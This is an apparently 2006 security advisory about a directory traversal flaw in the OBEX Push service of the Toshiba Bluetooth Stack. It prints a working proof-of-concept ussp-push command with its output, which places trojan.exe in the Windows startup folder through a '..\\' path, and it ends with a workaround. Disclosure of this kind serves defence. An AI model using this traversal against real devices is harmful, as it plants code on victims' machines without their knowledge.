DMA[2006-0112a] - 'Toshiba Bluetooth Stack Directory Transversal'
DMA[2006-0112a] - 'Toshiba Bluetooth Stack Directory Transversal'
Author: Kevin Finisterre
Vendor: http://www.toshiba-tro.de/
Product: 'Toshiba Bluetooth Stack <=v4.00.23(T)'
References:
http://www.digitalmunition.com/DMA[2006-0112a].txt
Description:
Toshiba was one of the first companies to provide a working Bluetooth PC stack
supporting
the v1.2 specification. In March 2004 Fujitsu made available their LifeBook
S7010 mobile
computer qualified compliant with Toshiba's stack becoming the first available
BT v1.2 device.
Toshiba's licensing of its stack has provided an advantage to partners looking
to support the
new specification.
Until recently when a few co-workers purchased Dell XPS M170 laptops with
internal TrueMobile
350 Bluetooth modules, I had not actually seen the Toshiba stack deployed. I
assume the reason
I have not seen it anywhere is due to the fact that Widcomm still seems to
dominate the market.
After leaving the office I searched for more information on the Toshiba stack
and wound up
downloading a copy from the Bluetooth SIG website.
Build20050512_v3031C-30Days.zip was and may
still be distributed at http://www.bluetooth.org. Since notifying Toshiba of
the issue I have
been unable to locate this file on the SIG website.
Both the version 3.x binary provided by the SIG as well as a version 4.x binary
that I downloaded
from http://aps.toshiba-tro.de/bluetooth/pages/download.php were tested and
found to be vulnerable
to simple ../ style attacks in their OBEX Push services. Further testing also
confirmed the Dell
driver was also exploitable. http://ftp.us.dell.com/network/R112482.EXE is
Toshiba Stack v4.00.11.
Using ussp-push an attacker can place a trojaned file anywhere on the
filesystem. This attack will
require the user to accept the connection request. Upon being prompted to
accept the request the
user is asked where the downloaded file should be placed. Regardless of the
user specified path an
attacker can place the anywhere that the user has permission to write. During
the connection
request no filename is presented so the person being attacked has no real
indication that something
malicious is occurring.
animosity:/home/kfinisterre/ussp-push-0.5# ./ussp-push
00:11:B1:07:BE:A7@4 trojan.exe ..\\..\\..\\..\\..\\windows\\startup\\pwned.exe
pushing file trojan.exe
name=trojan.exe, size=18009
Registered transport
set user data
created new objext
Local device 00:0A:3A:54:71:95
Remote device 00:11:B1:07:BE:A7 (4)
started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!
Connection return code: 0, id: 0
Connection established
connected to server
Sending file: ..\..\..\..\..\windows\startup\pwned.exe, path: trojan.exe, size:
18009
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
reqdone
Command (02) has now finished, rsp: 20reqdone
Command (01) has now finished, rsp: 20Disconnect done!pushed!!
Work Around:
Do not accept connection requests from unknown sources. Wait for proper vendor
response and
updates. Multiple attempts to inform the vendor about this issue were made
however I was unable
to maintain a dialog with anyone that would respond to email. Further questions
about this issue
should be directed to the Toshiba support staff or your hardware manufacturer.